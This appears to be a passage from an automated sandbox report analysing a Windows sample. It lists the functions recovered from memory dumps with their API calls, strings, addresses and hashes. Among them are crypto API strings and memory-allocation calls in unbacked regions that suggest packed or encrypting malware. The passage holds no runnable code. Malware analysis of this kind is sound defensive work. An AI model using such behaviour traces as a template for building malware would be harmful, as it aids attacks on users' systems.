CryptHashData, xrefs: 00310230, 00310233
CryptCreateHash, xrefs: 00310211, 00310214
CryptEncrypt, xrefs: 0031026E, 00310271
rypt, xrefs: 003102EF, 003102F2
CryptDeriveKey, xrefs: 0031024F, 00310252

Memory Dump Source

Source File: 0000000D.00000002.55322478596.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_310000_431846743.jbxd

Similarity

API ID:
String ID: CryptAcquireContextA$CryptCreateHash$CryptDeriveKey$CryptEncrypt$CryptHashData$rypt$tEncrypt
API String ID: 0-299839648
Opcode ID: 28ff45b24469f5f2112780e45f7afa2a5872612da5b2b81f99d34a07dca220fd
Instruction ID: 09b8feea2b28a966e431325d7da085590bcfcb0018f68a694fbc101a29ecb70d
Opcode Fuzzy Hash: 28ff45b24469f5f2112780e45f7afa2a5872612da5b2b81f99d34a07dca220fd
Instruction Fuzzy Hash: CCC12E60D082C8D9EB16C7E4D8497DEBFB55F26748F044098E1487F282D7FE5688C766

Uniqueness

Uniqueness Score: -1.00%

Function 0032002D, Relevance: 4.9, APIs: 3, Instructions: 392
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNEL32(?,?,?,?,00320005), ref: 003200EB
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00320005), ref: 00320113

Memory Dump Source

Source File: 0000000D.00000002.55322487309.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_431846743.jbxd

Similarity

API ID: AllocInfoNativeSystemVirtual
String ID:
API String ID: 2032221330-0
Opcode ID: 473b58f7a167e2a1e580efbb33301050c8c34e0b7915a5bdb1048dcc05cabd4f
Instruction ID: 9a12b9eb3a3b5d37bc7f0950f80d54bf38d1cc77e08e75d15843b80b38f147da
Opcode Fuzzy Hash: 473b58f7a167e2a1e580efbb33301050c8c34e0b7915a5bdb1048dcc05cabd4f
Instruction Fuzzy Hash: D8E11575A043228FDB29DF59D88472AB7E0FF94308F15852DE9859B342E774EC49CB81

Uniqueness

Uniqueness Score: -1.00%

Function 004012A1, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNEL32 ref: 004012B8

Strings

Control Panel\International\Geo, xrefs: 004012AE

Memory Dump Source

Source File: 0000000D.00000002.55322585048.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.55322575601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.55322594655.0000000000403000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.55322604364.0000000000405000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.55322612736.0000000000406000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_431846743.jbxd

Similarity

API ID: Open
String ID: Control Panel\International\Geo
API String ID: 71445658-536101429
Opcode ID: f2ca80afcd04f363ed8b3c2d820b5acf091907ca4149591c099e708eb7090943
Instruction ID: 623ab5b53b3c2058ffd3ed1b555fc8586722e231771353ed3acda7d84113b206
Opcode Fuzzy Hash: f2ca80afcd04f363ed8b3c2d820b5acf091907ca4149591c099e708eb7090943
Instruction Fuzzy Hash: AEC08C752C03147EE6100760AC03FAA3748E704B02F30012E7207B24C2C2A000084564

Uniqueness

Uniqueness Score: -1.00%

Function 0040270E, Relevance: 3.0, APIs: 2, Instructions: 12
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_onexit.MSVCRT ref: 0040271B
__dllonexit.MSVCRT ref: 00402731

Memory Dump Source

Source File: 0000000D.00000002.55322585048.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.55322575601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.55322594655.0000000000403000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.55322604364.0000000000405000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.55322612736.0000000000406000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_431846743.jbxd

Similarity

API ID: __dllonexit_onexit
String ID:
API String ID: 2384194067-0
Opcode ID: 41168e6eb0db04b6aa9ae4de840d0b552f203041acba80f05aeaa2b6b2dc4cd9
Instruction ID: df4ba6893ca0cac78af7f652cc5d7df2cd035058c053ba143f67e89a2da5bba8
Opcode Fuzzy Hash: 41168e6eb0db04b6aa9ae4de840d0b552f203041acba80f05aeaa2b6b2dc4cd9
Instruction Fuzzy Hash: 6CC01231450610AACA057B10FE0A7867711EBD0737B70C77AF065300F187790A54ADAE

Uniqueness

Uniqueness Score: -1.00%

Function 00401268, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401276

Memory Dump Source

Source File: 0000000D.00000002.55322585048.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.55322575601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.55322594655.0000000000403000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.55322604364.0000000000405000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.55322612736.0000000000406000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_431846743.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 7c42486130693ded2b0d9908c3d08e2c0dbada9dfd0c1f9ad2efcd502e1fa9bc
Instruction ID: 9c843af1a0861507d30a51251d48791bd3b6ff6ceb89dea048ca65945bd0d6ca
Opcode Fuzzy Hash: 7c42486130693ded2b0d9908c3d08e2c0dbada9dfd0c1f9ad2efcd502e1fa9bc
Instruction Fuzzy Hash: 4DE0D8312093609BD312CE1C9840FA7F790AB5DB10F0044AEF581B7191C2305C41C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 004028FE, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#1576.MFC42(004028A0,004028A0,004028A0,004028A0,004028A0,00000000,?,0000000A), ref: 0040290E

Memory Dump Source

Source File: 0000000D.00000002.55322585048.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.55322575601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.55322594655.0000000000403000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.55322604364.0000000000405000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.55322612736.0000000000406000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_431846743.jbxd

Similarity

API ID: #1576
String ID:
API String ID: 1976119259-0
Opcode ID: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
Instruction ID: 938215fdd3e634f6bfb0a4fab6d9080def83c43837c2a94a768619a28cf0a1dc
Opcode Fuzzy Hash: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
Instruction Fuzzy Hash: 8BB00876518397ABCB02EE91890592ABAA6BB98304F484C1DB2A1100A587768429FB16

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00401A57, Relevance: 13.6, APIs: 9, Instructions: 63windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 00401A63
#470.MFC42 ref: 00401A73
SendMessageA.USER32 ref: 00401A8A
GetSystemMetrics.USER32 ref: 00401A98
GetSystemMetrics.USER32 ref: 00401A9E
GetClientRect.USER32 ref: 00401AA9
DrawIcon.USER32 ref: 00401AD6
#755.MFC42 ref: 00401ADF
#2379.MFC42 ref: 00401AEA

Memory Dump Source

Source File: 0000000D.00000002.55322585048.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.55322575601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.55322594655.0000000000403000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.55322604364.0000000000405000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.55322612736.0000000000406000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_431846743.jbxd

Similarity

API ID: MetricsSystem$#2379#470#755ClientDrawIconIconicMessageRectSend
String ID:
API String ID: 1397574227-0
Opcode ID: b5050d70c34d388316e9cb320daa54272746495e68a914dbfbc863fb065d247e
Instruction ID: 6c92bf739a647b1972c25edd5a1750e6554c8e82d2b5e7f998f32acc8b1b98e6
Opcode Fuzzy Hash: b5050d70c34d388316e9cb320daa54272746495e68a914dbfbc863fb065d247e
Instruction Fuzzy Hash: 46114F72610219AFDB00AFB8DE49DAE7BBEEB44301F040579F546E71E0DA74E904CB14

Uniqueness

Uniqueness Score: -1.00%

Function 00310350, Relevance: 1.3, Strings: 1, Instructions: 9COMMON

Download Yara Rule

Strings

CryptAcquireContextA, xrefs: 00310353

Memory Dump Source

Source File: 0000000D.00000002.55322478596.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_310000_431846743.jbxd

Similarity

API ID:
String ID: CryptAcquireContextA
API String ID: 0-2822909605
Opcode ID: 3585cc5e86e4b4f2c0b231822883ac188ad7ac996d5f3a190238e1ab2981f7b1
Instruction ID: 3aed54436f5767a83b01f55326dea564c088d466d319321e9a1229c6b183aa19
Opcode Fuzzy Hash: 3585cc5e86e4b4f2c0b231822883ac188ad7ac996d5f3a190238e1ab2981f7b1
Instruction Fuzzy Hash: DCC04C7595664CEBC711CB89D541A59B7FCE709650F100195EC0893700D5356E109595

Uniqueness

Uniqueness Score: -1.00%

Function 00320467, Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.55322487309.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_431846743.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
Instruction ID: 556c95a3967270723e191946f11ce9f129796cdbfe752e861de85ab8e15a05ed
Opcode Fuzzy Hash: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
Instruction Fuzzy Hash: F331C336A0835A8FC715DF19E480A2AB7E5FF89304F5649ADE59587313D330F90A8F91

Uniqueness

Uniqueness Score: -1.00%

Function 004010DA, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.55322585048.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.55322575601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.55322594655.0000000000403000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.55322604364.0000000000405000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.55322612736.0000000000406000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_431846743.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2be6f62b562e5c4429d975791db73d9bf36d8a73ddeea1106ffbb7eec89d0a3
Instruction ID: b4b312fe3a0bf3500f56ba9c68af6614ef01e88f3f64379312b6b6f37a325d42
Opcode Fuzzy Hash: c2be6f62b562e5c4429d975791db73d9bf36d8a73ddeea1106ffbb7eec89d0a3
Instruction Fuzzy Hash: 61B09270A1668DEBCB01CB9DE641A49B7FCE708A88F1000A8E409E3700D274EF009A54

Uniqueness

Uniqueness Score: -1.00%

Function 00401767, Relevance: 70.2, APIs: 24, Strings: 16, Instructions: 204
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 0040176C
#4710.MFC42 ref: 00401779
GetSystemMenu.USER32 ref: 00401784
#2863.MFC42(00000000), ref: 0040178B
#540.MFC42(00000000), ref: 00401799
#4160.MFC42(00000065,00000000), ref: 004017A6
AppendMenuA.USER32(?,00000800,00000000,00000000), ref: 004017C3
AppendMenuA.USER32(?,00000000,00000010,?), ref: 004017CF
#800.MFC42(00000065,00000000), ref: 004017D8
SendMessageA.USER32 ref: 004017F4
SendMessageA.USER32 ref: 00401802
#1168.MFC42 ref: 00401808
#1146.MFC42(00000084,0000000E,00000084), ref: 00401816
LoadIconA.USER32 ref: 00401822
DestroyIcon.USER32(?,00000000), ref: 00401838
#1168.MFC42 ref: 0040183E
#1146.MFC42(00000086,0000000E,00000086), ref: 0040184C
LoadIconA.USER32 ref: 00401852
DestroyIcon.USER32(?,00000000), ref: 00401865
#1168.MFC42 ref: 0040186B
#1146.MFC42(00000085,0000000E,00000085), ref: 00401879
LoadIconA.USER32 ref: 0040187F
DestroyIcon.USER32(00000000,00000000), ref: 0040188F
SendMessageA.USER32 ref: 004019F0

Strings

Root 3 3rd level child, xrefs: 004019D1
Root 3, xrefs: 00401933
Root 1 4th level child, xrefs: 00401921
Root 1, xrefs: 00401895
Root 3 2nd level child, xrefs: 004019C1
Root 3 1st level child's 2nd level child, xrefs: 0040199D
Root 1 3rd level child, xrefs: 0040190F
Root 3 1st level child, xrefs: 0040197A
Root 4 2nd level child, xrefs: 0040196A
Root 3 1st level child's 1st level child, xrefs: 0040198A
Root 4, xrefs: 00401943
Root 2, xrefs: 004018D8
Root 1 1st level child, xrefs: 004018EB
Root 3 1st level child's 3rd level child, xrefs: 004019AF
Root 1 2nd level child, xrefs: 004018FD
Root 4 1st level child, xrefs: 00401959

Memory Dump Source

Source File: 0000000D.00000002.55322585048.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.55322575601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.55322594655.0000000000403000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.55322604364.0000000000405000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.55322612736.0000000000406000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_431846743.jbxd

Similarity

API ID: Icon$#1146#1168DestroyLoadMenuMessageSend$Append$#2863#4160#4710#540#800H_prologSystem
String ID: Root 1$Root 1 1st level child$Root 1 2nd level child$Root 1 3rd level child$Root 1 4th level child$Root 2$Root 3$Root 3 1st level child$Root 3 1st level child's 1st level child$Root 3 1st level child's 2nd level child$Root 3 1st level child's 3rd level child$Root 3 2nd level child$Root 3 3rd level child$Root 4$Root 4 1st level child$Root 4 2nd level child
API String ID: 2014748477-2074257982
Opcode ID: 76561af6e66c6c8cdef270ad34e90add63ba8afe98c36df34aa416e1bc5bcb7f
Instruction ID: eb79eba728e17d5ed5a69d75820a2d0973927f36d676c535e8bc1daa52409dd7
Opcode Fuzzy Hash: 76561af6e66c6c8cdef270ad34e90add63ba8afe98c36df34aa416e1bc5bcb7f
Instruction Fuzzy Hash: B4611E70A00709ABDF116BA1CD4AFAFBE7AEF88704F14442EF501762F1DBB959009B58

Uniqueness

Uniqueness Score: -1.00%

Function 004021DB, Relevance: 45.2, APIs: 30, Instructions: 150
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClientRect.USER32 ref: 004021F0
GetDC.USER32(?), ref: 004021F9
#2859.MFC42(00000000), ref: 00402200
#2567.MFC42(?,?,?,00000000), ref: 00402213
InflateRect.USER32(?,000000FF,000000FF), ref: 00402226
#4123.MFC42 ref: 0040222A
GetSysColor.USER32 ref: 0040223B
GetSysColor.USER32 ref: 0040224A
GetSysColor.USER32 ref: 0040224F
#2567.MFC42(?,00000000), ref: 00402258
InflateRect.USER32(?,000000FF,000000FF), ref: 00402265
GetSystemMetrics.USER32 ref: 00402269
GetSysColor.USER32 ref: 00402279
GetSysColor.USER32 ref: 0040227E
#2567.MFC42(?,00000000), ref: 00402287
InflateRect.USER32(?,000000FF,000000FF), ref: 00402294
GetSysColor.USER32 ref: 00402298
GetSysColor.USER32 ref: 0040229D
#2567.MFC42(?,00000000), ref: 004022A6
#4123.MFC42(?,00000000), ref: 004022AE
OffsetRect.USER32 ref: 004022D2
GetSysColor.USER32 ref: 004022DA
GetSysColor.USER32 ref: 004022E9
GetSysColor.USER32 ref: 00402314
#2567.MFC42(00000000,00000000), ref: 0040231D
ReleaseDC.USER32(?,?), ref: 0040232B

Memory Dump Source

Source File: 0000000D.00000002.55322585048.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.55322575601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.55322594655.0000000000403000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.55322604364.0000000000405000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.55322612736.0000000000406000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_431846743.jbxd

Similarity

API ID: Color$#2567Rect$Inflate$#4123$#2859ClientMetricsOffsetReleaseSystem
String ID:
API String ID: 3574349519-0
Opcode ID: 7cbfe6d1f3f536a8cac1869bb7a83b24eb0af64d2d314227414d6713dca6bb43
Instruction ID: fb77aa9778783f10f3bfbe6a76275cffd50fd6737c3accfdcbb4984c63bf03aa
Opcode Fuzzy Hash: 7cbfe6d1f3f536a8cac1869bb7a83b24eb0af64d2d314227414d6713dca6bb43
Instruction Fuzzy Hash: 3C418F71A00119BBDF10ABE1CE49EBF7E7CFB44760F10057ABA15B61D1DAB48A00AB75

Uniqueness

Uniqueness Score: -1.00%

Function 0040111F, Relevance: 37.7, APIs: 25, Instructions: 177
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SendMessageA.USER32 ref: 00401154
SendMessageA.USER32 ref: 0040115C
SendMessageA.USER32 ref: 00401164
SendMessageA.USER32 ref: 0040116C
SendMessageA.USER32 ref: 00401174
SendMessageA.USER32 ref: 0040117C
SendMessageA.USER32 ref: 00401184
SendMessageA.USER32 ref: 0040118C
SendMessageA.USER32 ref: 00401194
SendMessageA.USER32 ref: 0040119C
SendMessageA.USER32 ref: 004011A4
SendMessageA.USER32 ref: 004011AC
SendMessageA.USER32 ref: 004011B4
SendMessageA.USER32 ref: 004011BC
SendMessageA.USER32 ref: 004011C4
SendMessageA.USER32 ref: 004011CC
SendMessageA.USER32 ref: 004011D4
SendMessageA.USER32 ref: 004011DC
SendMessageA.USER32 ref: 004011E4
SendMessageA.USER32 ref: 004011EC
SendMessageA.USER32 ref: 004011F4
SendMessageA.USER32 ref: 004011FC
SendMessageA.USER32 ref: 00401204
SendMessageA.USER32 ref: 0040120C
strcmp.MSVCRT ref: 00401235

Memory Dump Source

Source File: 0000000D.00000002.55322585048.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.55322575601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.55322594655.0000000000403000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.55322604364.0000000000405000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.55322612736.0000000000406000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_431846743.jbxd

Similarity

API ID: MessageSend$strcmp
String ID:
API String ID: 1026492426-0
Opcode ID: bdca4a18467a09fec4bb6cf044decc485a7405438a9a3022ba9d02e32459d345
Instruction ID: 6eed106d71de69c99f0400bd9a7b8a33876bfe5d1c24387f7ab3a6ec800dad13
Opcode Fuzzy Hash: bdca4a18467a09fec4bb6cf044decc485a7405438a9a3022ba9d02e32459d345
Instruction Fuzzy Hash: 434102A57843187FF1315A27DC96F1B7E9CDB45BA8F12181AB3057A1C2D9F6E60089F0

Uniqueness

Uniqueness Score: -1.00%

Function 00401CE6, Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 158
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 00401CEB
#2859.MFC42(?,00000000,?,00000001), ref: 00401CFE
SendMessageA.USER32 ref: 00401D13
CopyRect.USER32(?,?), ref: 00401D24
ImageList_GetImageCount.COMCTL32(?), ref: 00401D30
ImageList_Draw.COMCTL32(?,?,?,?,?,00000001), ref: 00401D9A
#3920.MFC42(00000000,00000000,00000001,00000000), ref: 00401DAF
#2567.MFC42(00000000,008080FF,00FF0000,00000000,00000000,00000001,00000000), ref: 00401DC4
#537.MFC42(004053F0), ref: 00401DDA
#3317.MFC42(?,?,004053F0), ref: 00401DF2
#2754.MFC42(?,?,004053F0), ref: 00401E06
#472.MFC42(00000000,00000001,?,?,?,004053F0), ref: 00401E15
#5788.MFC42(?,00000000,00000001,?,?,?,004053F0), ref: 00401E24
Rectangle.GDI32(?,?,?,00000000,?), ref: 00401E43
#5788.MFC42(00000000), ref: 00401E4C
#2414.MFC42(00000000), ref: 00401E54
#2414.MFC42(00000000), ref: 00401E67
#2380.MFC42(00000003,00000001,00000002,00000001,004053F0), ref: 00401E82
#800.MFC42 ref: 00401EA3

Strings

(8@, xrefs: 00401E60

Memory Dump Source

Source File: 0000000D.00000002.55322585048.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.55322575601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.55322594655.0000000000403000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.55322604364.0000000000405000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.55322612736.0000000000406000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_431846743.jbxd

Similarity

API ID: Image$#2414#5788List_$#2380#2567#2754#2859#3317#3920#472#537#800CopyCountDrawH_prologMessageRectRectangleSend
String ID: (8@
API String ID: 1559282378-2824614689
Opcode ID: 44c095e605719bc4b6f77e11b94b5d33d0ce0a2cd3f19f19b0373bb3e86b997b
Instruction ID: e688b3058943d2db0ee3cd47aa1a08d6f4277226d546720439443fc76aa8dd67
Opcode Fuzzy Hash: 44c095e605719bc4b6f77e11b94b5d33d0ce0a2cd3f19f19b0373bb3e86b997b
Instruction Fuzzy Hash: 0A517E71A00209AFDF14DF95C949AEEBBB9FF08304F10856AF501B62D1CBB5AE44CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00401C1A, Relevance: 22.6, APIs: 15, Instructions: 96windowCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004020C1
SendMessageA.USER32 ref: 004020E0
#540.MFC42 ref: 004020EB
GetDC.USER32(?), ref: 004020F6
#2859.MFC42(00000000), ref: 004020FD
GetSystemMetrics.USER32 ref: 00402106
#3317.MFC42(00000000,?), ref: 00402122
SendMessageA.USER32 ref: 00402134
GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 00402148
#537.MFC42(00405310), ref: 0040217D
GetTextExtentPoint32A.GDI32(?,00000000,?,?), ref: 00402191
#800.MFC42 ref: 004021A0
ReleaseDC.USER32(?,?), ref: 004021AB
SendMessageA.USER32 ref: 004021BE
#800.MFC42 ref: 004021C7

Memory Dump Source

Source File: 0000000D.00000002.55322585048.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.55322575601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.55322594655.0000000000403000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.55322604364.0000000000405000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.55322612736.0000000000406000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_431846743.jbxd

Similarity

API ID: MessageSend$#800ExtentPoint32Text$#2859#3317#537#540H_prologMetricsReleaseSystem
String ID:
API String ID: 1589404001-0
Opcode ID: 728f1d90b333337ff640fdf8344964e7e0982b949069d6a70da423a0ec078cfc
Instruction ID: 448610b032a2211a25e3202d758c6bc1ea8e792e9bde118c1bae8b5813ab2c6a
Opcode Fuzzy Hash: 728f1d90b333337ff640fdf8344964e7e0982b949069d6a70da423a0ec078cfc
Instruction Fuzzy Hash: 3A414B71900209AFCF10DFA4CD49AAEBBB9FF48304F00442AE511B62E1D7756E01CF68

Uniqueness

Uniqueness Score: -1.00%

Function 00401C1F, Relevance: 13.6, APIs: 9, Instructions: 77COMMON

Download Yara Rule

APIs

#2859.MFC42(?), ref: 00401C36
#4123.MFC42(?), ref: 00401C3F
#2754.MFC42(?,00C0C0C0,?), ref: 00401C53
#5875.MFC42(00000001,?,00C0C0C0,?), ref: 00401C5C
GetSysColor.USER32 ref: 00401C65
#2754.MFC42(?,?,?), ref: 00401C8A
#5875.MFC42(00000001,?,?,?), ref: 00401C92
#2754.MFC42(?,?,?), ref: 00401CBE
#5875.MFC42(00000001,?,?,?), ref: 00401CC6

Memory Dump Source

Source File: 0000000D.00000002.55322585048.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.55322575601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.55322594655.0000000000403000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.55322604364.0000000000405000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.55322612736.0000000000406000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_431846743.jbxd

Similarity

API ID: #2754#5875$#2859#4123Color
String ID:
API String ID: 1910319054-0
Opcode ID: 4fd04bfc78a80922ebe0a380fa3382f68872101838d1a64f3889dbabb215a338
Instruction ID: b4d0aa36d687d76150ef3c32aeb2c73d61d5d3b3d0006c97c5da1615f5e26509
Opcode Fuzzy Hash: 4fd04bfc78a80922ebe0a380fa3382f68872101838d1a64f3889dbabb215a338
Instruction Fuzzy Hash: B921C8313442445BDA266B568998F3E77DA6F84308F04043FF803A32E1DBBEDC459B18

Uniqueness

Uniqueness Score: -1.00%

Function 00401B11, Relevance: 12.0, APIs: 8, Instructions: 45COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00401B16
#567.MFC42(00000000,?,00000000,?,004016EF,00000066,?,?,?,0040160A,00000000), ref: 00401B24
#384.MFC42(00000000,?,00000000,?,004016EF,00000066,?,?,?,0040160A,00000000), ref: 00401B38
GetSysColor.USER32 ref: 00401B4F
GetSysColor.USER32 ref: 00401B56
GetSysColor.USER32 ref: 00401B5D
GetSysColor.USER32 ref: 00401B64
#2096.MFC42(00000010,00000010,00000009,00000002,00000001,?,00000000,?,004016EF,00000066,?,?,?,0040160A,00000000), ref: 00401B79

Memory Dump Source

Source File: 0000000D.00000002.55322585048.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.55322575601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.55322594655.0000000000403000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.55322604364.0000000000405000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.55322612736.0000000000406000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_431846743.jbxd

Similarity

API ID: Color$#2096#384#567H_prolog
String ID:
API String ID: 4170207429-0
Opcode ID: caedbeffb5df5d99fd3dff073ee88d8126bacf6db02d36935cb0ff4101d82348
Instruction ID: 552dbbc5a8b14f0679882fb9a0c06257b098a61b55743734ca476e3c02aee2c0
Opcode Fuzzy Hash: caedbeffb5df5d99fd3dff073ee88d8126bacf6db02d36935cb0ff4101d82348
Instruction Fuzzy Hash: E2017571B40754ABD720AF66894AB5ABBA4FB80705F004C3EE2416B6C1DBFAA5448B54

Uniqueness

Uniqueness Score: -1.00%

Function 00401F25, Relevance: 10.6, APIs: 7, Instructions: 77windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32 ref: 00401F48
#823.MFC42(00000006), ref: 00401F4E
SendMessageA.USER32 ref: 00401F71
SendMessageA.USER32 ref: 00401F95
SendMessageA.USER32 ref: 00401FB8
#823.MFC42(00000006), ref: 00401FBF
SendMessageA.USER32 ref: 00401FEB

Memory Dump Source

Source File: 0000000D.00000002.55322585048.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.55322575601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.55322594655.0000000000403000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.55322604364.0000000000405000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.55322612736.0000000000406000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_431846743.jbxd

Similarity

API ID: MessageSend$#823
String ID:
API String ID: 3019263841-0
Opcode ID: f9e0009e9dc80343820839db8562cd4116cce26f4e51f59be65ee9b692f6ba3f
Instruction ID: 486407449269acd2580107f9ecc8b0b56822c8540115cb24ae73aa22315cd849
Opcode Fuzzy Hash: f9e0009e9dc80343820839db8562cd4116cce26f4e51f59be65ee9b692f6ba3f
Instruction Fuzzy Hash: B1218132104244BBDB016F64DC49EA6BBA9FF58700F16C069F9489F2F2E6B1D900C764

Uniqueness

Uniqueness Score: -1.00%

Function 004016C8, Relevance: 7.5, APIs: 5, Instructions: 29windowCOMMON

Download Yara Rule

